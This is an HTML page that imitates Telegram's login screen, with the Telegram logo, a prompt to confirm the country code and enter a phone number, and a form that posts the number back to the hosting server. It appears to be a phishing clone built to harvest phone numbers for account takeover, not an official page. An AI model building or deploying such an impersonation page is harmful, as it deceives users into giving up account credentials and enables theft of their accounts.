<!DOCTYPE html>
<html>
<head>
	<title>Telegram</title>
	<style>
		body{
			background-color: #282828;
		}
		.logo{
			width: 220px;
		}
		.tgfontlogo{
			font-family: "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Geneva, Verdana,sans-serif; font-size: 34px;
			color: white;

		}
		.tgfont{
			font-family: "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Geneva, Verdana,sans-serif; font-size: 20px;
			color: #aaaaaa;
		}
		.phonefield1{
			width: 370px;
			height: 50px;
			font-family: "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Geneva, Verdana,sans-serif; font-size: 28px;
			color: white;
			background-color: #282828;
			border-style: solid;
			border-width: 1px;
			border-radius: 13px;
		}
		.phonefield:active,
		.phonefield:focus{
			outline: none;
			border-color: #8774e1;
		}
		.nextbutton{
			width: 370px;
			height: 50px;
			font-family: "Lucida Grande", "Lucida Sans Unicode", "Lucida Sans", Geneva, Verdana,sans-serif; font-size: 20px;
			color: white;
			background-color: #8774e1;
			border-style: solid;
			border-width: 0px;
			border-radius: 13px;
		}

	.phonefield1 {
	/* Font & Text */
	font-family: Roboto, -apple-system, "apple color emoji", BlinkMacSystemFont, "Segoe UI", Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
	font-size: 16px;
	font-style: normal;
	font-variant: normal;
	font-weight: 400;
	letter-spacing: normal;
	line-height: 21px;
	text-decoration: none solid rgb(255, 255, 255);
	text-align: start;
	text-indent: 0px;
	text-transform: none;
	vertical-align: baseline;
	white-space: pre-wrap;
	word-spacing: 0px;

	/* Color & Background */
	background-attachment: scroll;
	background-color: rgba(0, 0, 0, 0);
	background-image: none;
	background-position: 0% 0%;
	background-repeat: repeat;
	color: rgb(255, 255, 255);

	/* Box */
	height: 54px;
	width: 360px;
	border: 1px solid rgb(47, 47, 47);
	border-top: 1px solid rgb(47, 47, 47);
	border-right: 1px solid rgb(47, 47, 47);
	border-bottom: 1px solid rgb(47, 47, 47);
	border-left: 1px solid rgb(47, 47, 47);
	margin: 0px;
	padding: 15px;
	max-height: none;
	min-height: 54px;
	max-width: none;
	min-width: 0px;

	/* Positioning */
	position: relative;
	top: 0px;
	bottom: 0px;
	right: 0px;
	left: 0px;
	float: none;
	display: block;
	clear: none;
	z-index: 1;

	/* List */
	list-style-image: none;
	list-style-type: disc;
	list-style-position: outside;

	/* Table */
	border-collapse: separate;
	border-spacing: 0px 0px;
	caption-side: top;
	empty-cells: show;
	table-layout: auto;

	/* Miscellaneous */
	overflow: visible;
	cursor: text;
	visibility: visible;

	/* Effects */
	transform: none;
	transition: border-color 0.2s ease 0s;
	outline: rgb(255, 0, 0) dashed 1px;
	outline-offset: 0px;
	box-sizing: border-box;
	resize: none;
	text-shadow: none;
	text-overflow: clip;
	word-wrap: break-word;
	box-shadow: none;
	border-top-left-radius: 10px;
	border-top-right-radius: 10px;
	border-bottom-left-radius: 10px;
	border-bottom-right-radius: 10px;
}


	</style>
</head>
<body>
<center>

<br><br><br><br><br><br>
<img class='logo' src="https://upload.wikimedia.org/wikipedia/commons/thumb/8/82/Telegram_logo.svg/512px-Telegram_logo.svg.png">

<form method="POST">
<h1 class="tgfontlogo">Telegram</h1>
<p class="tgfont">Please confirm your country code and enter your phone number.</p>
<input class="phonefield" value='+1' name="phonenumber">
<br><br>
<input type='submit' value='NEXT' class="nextbutton">
<br><br><br><br><br><br>
</form>
</center>
</body>
</html>